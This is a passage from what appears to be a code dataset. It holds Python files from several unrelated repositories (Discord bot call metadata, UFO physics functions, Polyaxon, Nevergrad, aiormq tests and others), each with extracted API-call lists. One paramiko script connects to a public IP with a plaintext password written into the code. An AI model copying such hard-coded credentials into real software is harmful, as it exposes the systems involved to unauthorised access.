19638), False, 'from discord.ext import commands, menus\n'), ((5879, 5953), 'discord.Webhook.from_url', 'discord.Webhook.from_url', (["os.environ['webhook1']"], {'session': 'self.bot.session'}), "(os.environ['webhook1'], session=self.bot.session)\n", (5903, 5953), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((5970, 6046), 'discord.Embed', 'discord.Embed', ([], {'title': '"""Update"""', 'color': '(35056)', 'timestamp': 'ctx.message.created_at'}), "(title='Update', color=35056, timestamp=ctx.message.created_at)\n", (5983, 6046), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((6306, 6381), 'discord.Webhook.from_url', 'discord.Webhook.from_url', (["os.environ['webhook99']"], {'session': 'self.bot.session'}), "(os.environ['webhook99'], session=self.bot.session)\n", (6330, 6381), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((6398, 6474), 'discord.Embed', 'discord.Embed', ([], {'title': '"""Update"""', 'color': '(35056)', 'timestamp': 'ctx.message.created_at'}), "(title='Update', color=35056, timestamp=ctx.message.created_at)\n", (6411, 6474), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((11890, 11911), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (11909, 11911), False, 'import traceback, textwrap\n'), ((12402, 12436), 'importlib.import_module', 'importlib.import_module', ([], {'name': 'args'}), '(name=args)\n', (12425, 12436), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((12547, 12571), 'importlib.reload', 'importlib.reload', (['module'], {}), '(module)\n', (12563, 12571), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((13693, 13740), 'traceback.format_exception', 'traceback.format_exception', (['etype', 'error', 'trace'], {}), '(etype, error, trace)\n', (13719, 13740), False, 'import traceback, textwrap\n'), ((18019, 18040), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (18038, 18040), False, 'import traceback, textwrap\n'), ((761, 788), 'random.randint', 'random.randint', (['(0)', '(16777215)'], {}), '(0, 16777215)\n', (775, 788), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((1604, 1625), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (1623, 1625), False, 'import traceback, textwrap\n'), ((2309, 2330), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2328, 2330), False, 'import traceback, textwrap\n'), ((2612, 2633), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2631, 2633), False, 'import traceback, textwrap\n'), ((4542, 4569), 'random.randint', 'random.randint', (['(0)', '(16777215)'], {}), '(0, 16777215)\n', (4556, 4569), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((8750, 8777), 'random.randint', 'random.randint', (['(0)', '(16777215)'], {}), '(0, 16777215)\n', (8764, 8777), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((9588, 9615), 'random.randint', 'random.randint', (['(0)', '(16777215)'], {}), '(0, 16777215)\n', (9602, 9615), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((12474, 12495), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (12493, 12495), False, 'import traceback, textwrap\n'), ((12610, 12631), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (12629, 12631), False, 'import traceback, textwrap\n'), ((15638, 15659), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (15657, 15659), False, 'import traceback, textwrap\n'), ((646, 662), 'utils.check', 'utils.check', (['ctx'], {}), '(ctx)\n', (657, 662), False, 'import utils\n'), ((2070, 2091), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2089, 2091), False, 'import traceback, textwrap\n'), ((7840, 7856), 'utils.check', 'utils.check', (['ctx'], {}), '(ctx)\n', (7851, 7856), False, 'import utils\n'), ((3477, 3540), 'discord.Activity', 'discord.Activity', ([], {'type': 'discord.ActivityType.watching', 'name': 'args'}), '(type=discord.ActivityType.watching, name=args)\n', (3493, 3540), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((19692, 19742), 'discord.utils.format_dt', 'discord.utils.format_dt', (['g.me.joined_at'], {'style': '"""d"""'}), "(g.me.joined_at, style='d')\n", (19715, 19742), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((19747, 19797), 'discord.utils.format_dt', 'discord.utils.format_dt', (['g.me.joined_at'], {'style': '"""T"""'}), "(g.me.joined_at, style='T')\n", (19770, 19797), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n')]
valassi/mg5amc_test
tests/input_files/full_sm_UFO/function_library.py
2e04f23353051f64e1604b23105fe3faabd32869
# This file is part of the UFO. # # This file contains definitions for functions that # are extensions of the cmath library, and correspond # either to functions that are in cmath, but inconvenient # to access from there (e.g. z.conjugate()), # or functions that are simply not defined. # # from __future__ import absolute_import __date__ = "22 July 2010" __author__ = "[email protected]" import cmath from .object_library import all_functions, Function # # shortcuts for functions from cmath # complexconjugate = Function(name = 'complexconjugate', arguments = ('z',), expression = 'z.conjugate()') re = Function(name = 're', arguments = ('z',), expression = 'z.real') im = Function(name = 'im', arguments = ('z',), expression = 'z.imag') # New functions (trigonometric) sec = Function(name = 'sec', arguments = ('z',), expression = '1./cmath.cos(z)') asec = Function(name = 'asec', arguments = ('z',), expression = 'cmath.acos(1./z)') csc = Function(name = 'csc', arguments = ('z',), expression = '1./cmath.sin(z)') acsc = Function(name = 'acsc', arguments = ('z',), expression = 'cmath.asin(1./z)')
[]
hackerwins/polyaxon
cli/polyaxon/managers/cli.py
ff56a098283ca872abfbaae6ba8abba479ffa394
#!/usr/bin/python # # Copyright 2019 Polyaxon, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # coding: utf-8 from __future__ import absolute_import, division, print_function from distutils.version import LooseVersion # pylint:disable=import-error from polyaxon.managers.base import BaseConfigManager from polyaxon.schemas.cli.cli_configuration import CliConfigurationConfig class CliConfigManager(BaseConfigManager): """Manages access cli configuration .polyaxoncli file.""" IS_GLOBAL = True CONFIG_FILE_NAME = ".polyaxoncli" CONFIG = CliConfigurationConfig FREQUENCY = 3 @classmethod def _get_count(cls): config = cls.get_config_or_default() return config.check_count + 1 @classmethod def reset( cls, check_count=None, current_version=None, server_versions=None, log_handler=None, ): if not any([check_count, current_version, server_versions, log_handler]): return cli_config = cls.get_config_or_default() if check_count is not None: cli_config.check_count = check_count if current_version is not None: cli_config.current_version = current_version if server_versions is not None: cli_config.server_versions = server_versions if log_handler is not None: cli_config.log_handler = log_handler CliConfigManager.set_config(config=cli_config) return cli_config @classmethod def should_check(cls): count = cls._get_count() cls.reset(check_count=count) if count > cls.FREQUENCY: return True config = cls.get_config_or_default() if config.current_version is None or config.min_version is None: return True return LooseVersion(config.current_version) < LooseVersion(config.min_version)
[((2323, 2359), 'distutils.version.LooseVersion', 'LooseVersion', (['config.current_version'], {}), '(config.current_version)\n', (2335, 2359), False, 'from distutils.version import LooseVersion\n'), ((2362, 2394), 'distutils.version.LooseVersion', 'LooseVersion', (['config.min_version'], {}), '(config.min_version)\n', (2374, 2394), False, 'from distutils.version import LooseVersion\n')]
fossabot/duckql-python
duckql/properties/tests/test_null.py
b4aead825ee456d9758db89830c7bca9d5d5106e
import pytest from duckql.properties import Null @pytest.fixture(scope="module") def valid_instance() -> Null: return Null() def test_string(valid_instance: Null): assert str(valid_instance) == 'NULL' def test_obj(valid_instance: Null): assert valid_instance.obj == 'properties.Null' def test_json_parse(valid_instance: Null): assert valid_instance.json() == '{"obj": "properties.Null"}'
[((53, 83), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (67, 83), False, 'import pytest\n'), ((125, 131), 'duckql.properties.Null', 'Null', ([], {}), '()\n', (129, 131), False, 'from duckql.properties import Null\n')]
sotaoverride/backup
openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/lib/gobject-introspection/giscanner/codegen.py
ca53a10b72295387ef4948a9289cb78ab70bc449
# -*- Mode: Python -*- # GObject-Introspection - a framework for introspecting GObject libraries # Copyright (C) 2010 Red Hat, Inc. # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the # Free Software Foundation, Inc., 59 Temple Place - Suite 330, # Boston, MA 02111-1307, USA. # import os from contextlib import contextmanager from . import ast class CCodeGenerator(object): def __init__(self, namespace, out_h_filename, out_c_filename, function_decoration=[], include_first_header=[], include_last_header=[], include_first_src=[], include_last_src=[]): self.out_h_filename = out_h_filename self.out_c_filename = out_c_filename self.function_decoration = function_decoration self.include_first_header = include_first_header self.include_last_header = include_last_header self.include_first_src = include_first_src self.include_last_src = include_last_src self._function_bodies = {} self.namespace = namespace def gen_symbol(self, name): name = name.replace(' ', '_') return '%s_%s' % (self.namespace.symbol_prefixes[0], name) def _typecontainer_to_ctype(self, param): if (isinstance(param, ast.Parameter) and param.direction in (ast.PARAM_DIRECTION_OUT, ast.PARAM_DIRECTION_INOUT)): suffix = '*' else: suffix = '' if (param.type.is_equiv((ast.TYPE_STRING, ast.TYPE_FILENAME)) and param.transfer == ast.PARAM_TRANSFER_NONE): return "const gchar*" + suffix return param.type.ctype + suffix def _write_prelude(self, out, func): if self.function_decoration: out.write(""" %s""" % " ".join(self.function_decoration)) out.write(""" %s %s (""" % (self._typecontainer_to_ctype(func.retval), func.symbol)) l = len(func.parameters) if func.parameters: for i, param in enumerate(func.parameters): ctype = self._typecontainer_to_ctype(param) out.write('%s %s' % (ctype, param.argname)) if i < l - 1: out.write(", ") else: out.write('void') out.write(")") def _write_prototype(self, func): self._write_prelude(self.out_h, func) self.out_h.write(";\n\n") def _write_annotation_transfer(self, node): if (node.type not in ast.BASIC_TYPES or node.type.ctype.endswith('*')): self.out_c.write(" (transfer %s)" % (node.transfer, )) def _write_docs(self, func): self.out_c.write("/**\n * %s:\n" % (func.symbol, )) for param in func.parameters: self.out_c.write(" * @%s" % (param.argname, )) if param.direction in (ast.PARAM_DIRECTION_OUT, ast.PARAM_DIRECTION_INOUT): if param.caller_allocates: allocate_string = ' caller-allocates' else: allocate_string = '' self.out_c.write(": (%s%s) " % (param.direction, allocate_string)) self._write_annotation_transfer(param) self.out_c.write(":\n") self.out_c.write(' *\n') self.out_c.write(' * Undocumented.') if func.retval.type != ast.TYPE_NONE: self.out_c.write('\n *\n') self.out_c.write(' * Returns: ') self._write_annotation_transfer(func.retval) self.out_c.write('\n */') @contextmanager def _function(self, func): self._write_prototype(func) self._write_docs(func) self._write_prelude(self.out_c, func) self.out_c.write("\n{\n") yield self.out_c.write("}\n\n") def _codegen_start(self): warning = '/* GENERATED BY testcodegen.py; DO NOT EDIT */\n\n' self.out_h.write(warning) nsupper = self.namespace.name.upper() for header in self.include_first_header: self.out_h.write("""#include "%s"\n""" % header) self.out_h.write(""" #ifndef __%s_H__ #define __%s_H__ #include <glib-object.h> """ % (nsupper, nsupper)) for header in self.include_last_header: self.out_h.write("""#include "%s"\n""" % header) self.out_c.write(warning) for header in self.include_first_src: self.out_c.write("""#include "%s"\n""" % header) src_dir = os.path.dirname(os.path.realpath(self.out_c.name)) header = os.path.relpath(self.out_h_filename, src_dir) self.out_c.write("""#include "%s"\n\n""" % (header, )) for header in self.include_last_src: self.out_c.write("""#include "%s"\n""" % header) def _codegen_end(self): self.out_h.write("""#endif\n""") self.out_h.close() self.out_c.close() def set_function_body(self, node, body): assert isinstance(node, ast.Function) self._function_bodies[node] = body def codegen(self): self.out_h = open(self.out_h_filename, 'w') self.out_c = open(self.out_c_filename, 'w') self._codegen_start() for node in self.namespace.values(): if isinstance(node, ast.Function): with self._function(node): body = self._function_bodies.get(node) if not body: body = '' self.out_c.write(body) self._codegen_end()
[((5221, 5266), 'os.path.relpath', 'os.path.relpath', (['self.out_h_filename', 'src_dir'], {}), '(self.out_h_filename, src_dir)\n', (5236, 5266), False, 'import os\n'), ((5169, 5202), 'os.path.realpath', 'os.path.realpath', (['self.out_c.name'], {}), '(self.out_c.name)\n', (5185, 5202), False, 'import os\n')]
mehrdad-shokri/nevergrad
nevergrad/parametrization/utils.py
7b68b00c158bf60544bc45997560edf733fb5812
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import os import sys import shutil import tempfile import subprocess import typing as tp from pathlib import Path from nevergrad.common import tools as ngtools class Descriptors: """Provides access to a set of descriptors for the parametrization This can be used within optimizers. """ # TODO add repr # pylint: disable=too-many-arguments def __init__( self, deterministic: bool = True, deterministic_function: bool = True, monoobjective: bool = True, not_manyobjective: bool = True, continuous: bool = True, metrizable: bool = True, ordered: bool = True, ) -> None: self.deterministic = deterministic self.deterministic_function = deterministic_function self.continuous = continuous self.metrizable = metrizable self.ordered = ordered self.monoobjective = monoobjective self.not_manyobjective = not_manyobjective def __and__(self, other: "Descriptors") -> "Descriptors": values = {field: getattr(self, field) & getattr(other, field) for field in self.__dict__} return Descriptors(**values) def __repr__(self) -> str: diff = ",".join(f"{x}={y}" for x, y in sorted(ngtools.different_from_defaults(instance=self, check_mismatches=True).items())) return f"{self.__class__.__name__}({diff})" class NotSupportedError(RuntimeError): """This type of operation is not supported by the parameter. """ class TemporaryDirectoryCopy(tempfile.TemporaryDirectory): # type: ignore """Creates a full copy of a directory inside a temporary directory This class can be used as TemporaryDirectory but: - the created copy path is available through the copyname attribute - the contextmanager returns the clean copy path - the directory where the temporary directory will be created can be controlled through the CLEAN_COPY_DIRECTORY environment variable """ key = "CLEAN_COPY_DIRECTORY" @classmethod def set_clean_copy_environment_variable(cls, directory: tp.Union[Path, str]) -> None: """Sets the CLEAN_COPY_DIRECTORY environment variable in order for subsequent calls to use this directory as base for the copies. """ assert Path(directory).exists(), "Directory does not exist" os.environ[cls.key] = str(directory) # pylint: disable=redefined-builtin def __init__(self, source: tp.Union[Path, str], dir: tp.Optional[tp.Union[Path, str]] = None) -> None: if dir is None: dir = os.environ.get(self.key, None) super().__init__(prefix="tmp_clean_copy_", dir=dir) self.copyname = Path(self.name) / Path(source).name shutil.copytree(str(source), str(self.copyname)) def __enter__(self) -> Path: super().__enter__() return self.copyname class FailedJobError(RuntimeError): """Job failed during processing """ class CommandFunction: """Wraps a command as a function in order to make sure it goes through the pipeline and notify when it is finished. The output is a string containing everything that has been sent to stdout Parameters ---------- command: list command to run, as a list verbose: bool prints the command and stdout at runtime cwd: Path/str path to the location where the command must run from Returns ------- str Everything that has been sent to stdout """ def __init__(self, command: tp.List[str], verbose: bool = False, cwd: tp.Optional[tp.Union[str, Path]] = None, env: tp.Optional[tp.Dict[str, str]] = None) -> None: if not isinstance(command, list): raise TypeError("The command must be provided as a list") self.command = command self.verbose = verbose self.cwd = None if cwd is None else str(cwd) self.env = env def __call__(self, *args: tp.Any, **kwargs: tp.Any) -> str: """Call the cammand line with addidional arguments The keyword arguments will be sent as --{key}={val} The logs are bufferized. They will be printed if the job fails, or sent as output of the function Errors are provided with the internal stderr """ # TODO make the following command more robust (probably fails in multiple cases) full_command = self.command + [str(x) for x in args] + ["--{}={}".format(x, y) for x, y in kwargs.items()] if self.verbose: print(f"The following command is sent: {full_command}") outlines: tp.List[str] = [] with subprocess.Popen(full_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=False, cwd=self.cwd, env=self.env) as process: try: assert process.stdout is not None for line in iter(process.stdout.readline, b''): if not line: break outlines.append(line.decode().strip()) if self.verbose: print(outlines[-1], flush=True) except Exception: # pylint: disable=broad-except process.kill() process.wait() raise FailedJobError("Job got killed for an unknown reason.") stderr = process.communicate()[1] # we already got stdout stdout = "\n".join(outlines) retcode = process.poll() if stderr and (retcode or self.verbose): print(stderr.decode(), file=sys.stderr) if retcode: subprocess_error = subprocess.CalledProcessError(retcode, process.args, output=stdout, stderr=stderr) raise FailedJobError(stderr.decode()) from subprocess_error return stdout
[((2787, 2817), 'os.environ.get', 'os.environ.get', (['self.key', 'None'], {}), '(self.key, None)\n', (2801, 2817), False, 'import os\n'), ((2902, 2917), 'pathlib.Path', 'Path', (['self.name'], {}), '(self.name)\n', (2906, 2917), False, 'from pathlib import Path\n'), ((4849, 4973), 'subprocess.Popen', 'subprocess.Popen', (['full_command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'shell': '(False)', 'cwd': 'self.cwd', 'env': 'self.env'}), '(full_command, stdout=subprocess.PIPE, stderr=subprocess.\n PIPE, shell=False, cwd=self.cwd, env=self.env)\n', (4865, 4973), False, 'import subprocess\n'), ((2499, 2514), 'pathlib.Path', 'Path', (['directory'], {}), '(directory)\n', (2503, 2514), False, 'from pathlib import Path\n'), ((2920, 2932), 'pathlib.Path', 'Path', (['source'], {}), '(source)\n', (2924, 2932), False, 'from pathlib import Path\n'), ((5876, 5963), 'subprocess.CalledProcessError', 'subprocess.CalledProcessError', (['retcode', 'process.args'], {'output': 'stdout', 'stderr': 'stderr'}), '(retcode, process.args, output=stdout, stderr=\n stderr)\n', (5905, 5963), False, 'import subprocess\n'), ((1445, 1514), 'nevergrad.common.tools.different_from_defaults', 'ngtools.different_from_defaults', ([], {'instance': 'self', 'check_mismatches': '(True)'}), '(instance=self, check_mismatches=True)\n', (1476, 1514), True, 'from nevergrad.common import tools as ngtools\n')]
airbornum/-Complete-Python-Scripting-for-Automation
Section 20/2.Document-transfer_files.py
bc053444f8786259086269ca1713bdb10144dd74
import paramiko ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname='54.165.97.91',username='ec2-user',password='paramiko123',port=22) sftp_client=ssh.open_sftp() #sftp_client.get('/home/ec2-user/paramiko_download.txt','paramiko_downloaded_file.txt') #sftp_client.chdir("/home/ec2-user") #print(sftp_client.getcwd()) #sftp_client.get('demo.txt','C:\\Users\\Automation\\Desktop\\download_file.txt') sftp_client.put("transfer_files.py",'/home/ec2-user/transfer_files.py') sftp_client.close() ssh.close()
[((23, 43), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (41, 43), False, 'import paramiko\n'), ((77, 101), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (99, 101), False, 'import paramiko\n')]
gmpreussner/Varriount.NimLime
nimlime_core/utils/internal_tools.py
33da0424248bf9360c2a7cbca4a22da7a8020785
# coding=utf-8 """ Internal tools for NimLime development & testing. """ from pprint import pprint import sublime try: from cProfile import Profile except ImportError: from profile import Profile from functools import wraps from pstats import Stats try: from StringIO import StringIO except ImportError: from io import StringIO debug_on = False if debug_on: sublime.message_dialog("NimLime running in debug mode.") # Debug printer def print_debug(*args, **kwargs): """ Print when debugging. :type args: Any :type kwargs: Any """ if debug_on: pprint(*args, **kwargs) # Profiling functions profiler = Profile() profiler_running = False def profile_func(func): """ Decorator which profiles a single function. Call print_profile_data to print the collected data. :type func: Callable :rtype: Callable """ @wraps(func) def _profile_wrapper(*args, **kwargs): global profiler_running if not profiler_running: profiler_running = True try: profiler.enable() return func(*args, **kwargs) finally: profiler.disable() profiler_running = False return _profile_wrapper def print_profile_data(): """ Print the collected profile data. """ stream = StringIO() statistics = Stats(profiler, stream=stream) statistics.sort_stats('cumulative') statistics.print_stats() print(stream.getvalue())
[((658, 667), 'profile.Profile', 'Profile', ([], {}), '()\n', (665, 667), False, 'from profile import Profile\n'), ((382, 438), 'sublime.message_dialog', 'sublime.message_dialog', (['"""NimLime running in debug mode."""'], {}), "('NimLime running in debug mode.')\n", (404, 438), False, 'import sublime\n'), ((892, 903), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (897, 903), False, 'from functools import wraps\n'), ((1365, 1375), 'io.StringIO', 'StringIO', ([], {}), '()\n', (1373, 1375), False, 'from io import StringIO\n'), ((1393, 1423), 'pstats.Stats', 'Stats', (['profiler'], {'stream': 'stream'}), '(profiler, stream=stream)\n', (1398, 1423), False, 'from pstats import Stats\n'), ((600, 623), 'pprint.pprint', 'pprint', (['*args'], {}), '(*args, **kwargs)\n', (606, 623), False, 'from pprint import pprint\n')]
dmvieira/driftage
test/unit/test_monitor.py
830188aa341029cc2a643b2b3b50e625953a35eb
import orjson from asynctest import TestCase, Mock, patch from freezegun import freeze_time from driftage.monitor import Monitor class TestMonitor(TestCase): def setUp(self): self.monitor = Monitor( "user_test@local", "pass_test", "identif" ) def tearDown(self): self.monitor.container.stop() def test_should_set_identifier_or_agent_name(self): self.assertEqual( self.monitor._identifier, "identif" ) monitor = Monitor( "user_test2@local", "pass_test" ) self.assertEqual( monitor._identifier, "user_test2" ) monitor.container.stop() @patch("driftage.monitor.WaitMonitorSubscriptions") async def test_should_add_subscription_behaviour(self, behaviour_mock): self.monitor.add_behaviour = Mock() await self.monitor.setup() self.monitor.add_behaviour.assert_called_once_with( behaviour_mock() ) @freeze_time("1989-08-12") @patch("driftage.monitor.FastNotifyContacts") @patch("driftage.monitor.Template") def test_should_notify_contacts_on_new_data( self, template_mock, behaviour_mock): self.monitor.add_behaviour = Mock() self.monitor.collect({"my data": 1}) self.monitor.add_behaviour.assert_called_once_with( behaviour_mock(), template=template_mock.return_value ) template_mock.assert_called_once_with( body=str(orjson.dumps({ "data": {"my data": 1}, "metadata": { "timestamp": 618883200.0, "identifier": "identif" } }), "utf-8") ) @freeze_time("1989-08-12") @patch("driftage.monitor.FastNotifyContacts") @patch("driftage.monitor.Template") def test_should_notify_contacts_on_new_data_with_call( self, template_mock, behaviour_mock): self.monitor.add_behaviour = Mock() self.monitor({"my data": 1}) self.monitor.add_behaviour.assert_called_once_with( behaviour_mock(), template=template_mock.return_value ) template_mock.assert_called_once_with( body=str(orjson.dumps({ "data": {"my data": 1}, "metadata": { "timestamp": 618883200.0, "identifier": "identif" } }), "utf-8") )
[((709, 759), 'asynctest.patch', 'patch', (['"""driftage.monitor.WaitMonitorSubscriptions"""'], {}), "('driftage.monitor.WaitMonitorSubscriptions')\n", (714, 759), False, 'from asynctest import TestCase, Mock, patch\n'), ((1020, 1045), 'freezegun.freeze_time', 'freeze_time', (['"""1989-08-12"""'], {}), "('1989-08-12')\n", (1031, 1045), False, 'from freezegun import freeze_time\n'), ((1051, 1095), 'asynctest.patch', 'patch', (['"""driftage.monitor.FastNotifyContacts"""'], {}), "('driftage.monitor.FastNotifyContacts')\n", (1056, 1095), False, 'from asynctest import TestCase, Mock, patch\n'), ((1101, 1135), 'asynctest.patch', 'patch', (['"""driftage.monitor.Template"""'], {}), "('driftage.monitor.Template')\n", (1106, 1135), False, 'from asynctest import TestCase, Mock, patch\n'), ((1774, 1799), 'freezegun.freeze_time', 'freeze_time', (['"""1989-08-12"""'], {}), "('1989-08-12')\n", (1785, 1799), False, 'from freezegun import freeze_time\n'), ((1805, 1849), 'asynctest.patch', 'patch', (['"""driftage.monitor.FastNotifyContacts"""'], {}), "('driftage.monitor.FastNotifyContacts')\n", (1810, 1849), False, 'from asynctest import TestCase, Mock, patch\n'), ((1855, 1889), 'asynctest.patch', 'patch', (['"""driftage.monitor.Template"""'], {}), "('driftage.monitor.Template')\n", (1860, 1889), False, 'from asynctest import TestCase, Mock, patch\n'), ((206, 256), 'driftage.monitor.Monitor', 'Monitor', (['"""user_test@local"""', '"""pass_test"""', '"""identif"""'], {}), "('user_test@local', 'pass_test', 'identif')\n", (213, 256), False, 'from driftage.monitor import Monitor\n'), ((513, 553), 'driftage.monitor.Monitor', 'Monitor', (['"""user_test2@local"""', '"""pass_test"""'], {}), "('user_test2@local', 'pass_test')\n", (520, 553), False, 'from driftage.monitor import Monitor\n'), ((873, 879), 'asynctest.Mock', 'Mock', ([], {}), '()\n', (877, 879), False, 'from asynctest import TestCase, Mock, patch\n'), ((1272, 1278), 'asynctest.Mock', 'Mock', ([], {}), '()\n', (1276, 1278), False, 'from asynctest import TestCase, Mock, patch\n'), ((2036, 2042), 'asynctest.Mock', 'Mock', ([], {}), '()\n', (2040, 2042), False, 'from asynctest import TestCase, Mock, patch\n'), ((1540, 1647), 'orjson.dumps', 'orjson.dumps', (["{'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}}"], {}), "({'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}})\n", (1552, 1647), False, 'import orjson\n'), ((2296, 2403), 'orjson.dumps', 'orjson.dumps', (["{'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}}"], {}), "({'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}})\n", (2308, 2403), False, 'import orjson\n')]
travisluong/fastarg
examples/todo_advanced/main.py
b21d5307ce6b296aa16f30bf220ca2ead8e9d4d3
import fastarg import commands.todo as todo import commands.user as user app = fastarg.Fastarg(description="productivity app", prog="todo") @app.command() def hello_world(name: str): """hello world""" print("hello " + name) app.add_fastarg(todo.app, name="todo") app.add_fastarg(user.app, name="user") if __name__ == "__main__": app.run()
[((80, 140), 'fastarg.Fastarg', 'fastarg.Fastarg', ([], {'description': '"""productivity app"""', 'prog': '"""todo"""'}), "(description='productivity app', prog='todo')\n", (95, 140), False, 'import fastarg\n')]
rwilhelm/aiormq
tests/test_channel.py
9aa278e61d16ba18748f5f5a3fc76d0a273fd14a
import asyncio import uuid import pytest from aiomisc_pytest.pytest_plugin import TCPProxy import aiormq async def test_simple(amqp_channel: aiormq.Channel): await amqp_channel.basic_qos(prefetch_count=1) assert amqp_channel.number queue = asyncio.Queue() deaclare_ok = await amqp_channel.queue_declare(auto_delete=True) consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put) await amqp_channel.basic_publish( b"foo", routing_key=deaclare_ok.queue, properties=aiormq.spec.Basic.Properties(message_id="123"), ) message = await queue.get() # type: DeliveredMessage assert message.body == b"foo" cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag) assert cancel_ok.consumer_tag == consume_ok.consumer_tag assert cancel_ok.consumer_tag not in amqp_channel.consumers await amqp_channel.queue_delete(deaclare_ok.queue) deaclare_ok = await amqp_channel.queue_declare(auto_delete=True) await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue) message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True) assert message.body == b"foo bar" async def test_blank_body(amqp_channel: aiormq.Channel): await amqp_channel.basic_qos(prefetch_count=1) assert amqp_channel.number queue = asyncio.Queue() deaclare_ok = await amqp_channel.queue_declare(auto_delete=True) consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put) await amqp_channel.basic_publish( b"", routing_key=deaclare_ok.queue, properties=aiormq.spec.Basic.Properties(message_id="123"), ) message = await queue.get() # type: DeliveredMessage assert message.body == b"" cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag) assert cancel_ok.consumer_tag == consume_ok.consumer_tag assert cancel_ok.consumer_tag not in amqp_channel.consumers await amqp_channel.queue_delete(deaclare_ok.queue) deaclare_ok = await amqp_channel.queue_declare(auto_delete=True) await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue) message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True) assert message.body == b"foo bar" @pytest.mark.no_catch_loop_exceptions async def test_bad_consumer(amqp_channel: aiormq.Channel, loop): channel = amqp_channel # type: aiormq.Channel await channel.basic_qos(prefetch_count=1) declare_ok = await channel.queue_declare() future = loop.create_future() await channel.basic_publish(b"urgent", routing_key=declare_ok.queue) consumer_tag = loop.create_future() async def bad_consumer(message): await channel.basic_cancel(await consumer_tag) future.set_result(message) raise Exception consume_ok = await channel.basic_consume( declare_ok.queue, bad_consumer, no_ack=False, ) consumer_tag.set_result(consume_ok.consumer_tag) message = await future await channel.basic_reject(message.delivery.delivery_tag, requeue=True) assert message.body == b"urgent" future = loop.create_future() await channel.basic_consume( declare_ok.queue, future.set_result, no_ack=True, ) message = await future assert message.body == b"urgent" async def test_ack_nack_reject(amqp_channel: aiormq.Channel): channel = amqp_channel # type: aiormq.Channel await channel.basic_qos(prefetch_count=1) declare_ok = await channel.queue_declare(auto_delete=True) queue = asyncio.Queue() await channel.basic_consume(declare_ok.queue, queue.put, no_ack=False) await channel.basic_publish(b"rejected", routing_key=declare_ok.queue) message = await queue.get() assert message.body == b"rejected" await channel.basic_reject(message.delivery.delivery_tag, requeue=False) await channel.basic_publish(b"nacked", routing_key=declare_ok.queue) message = await queue.get() assert message.body == b"nacked" await channel.basic_nack(message.delivery.delivery_tag, requeue=False) await channel.basic_publish(b"acked", routing_key=declare_ok.queue) message = await queue.get() assert message.body == b"acked" await channel.basic_ack(message.delivery.delivery_tag) async def test_confirm_multiple(amqp_channel: aiormq.Channel): """ RabbitMQ has been observed to send confirmations in a strange pattern when publishing simultaneously where only some messages are delivered to a queue. It sends acks like this 1 2 4 5(multiple, confirming also 3). This test is probably inconsequential without publisher_confirms This is a regression for 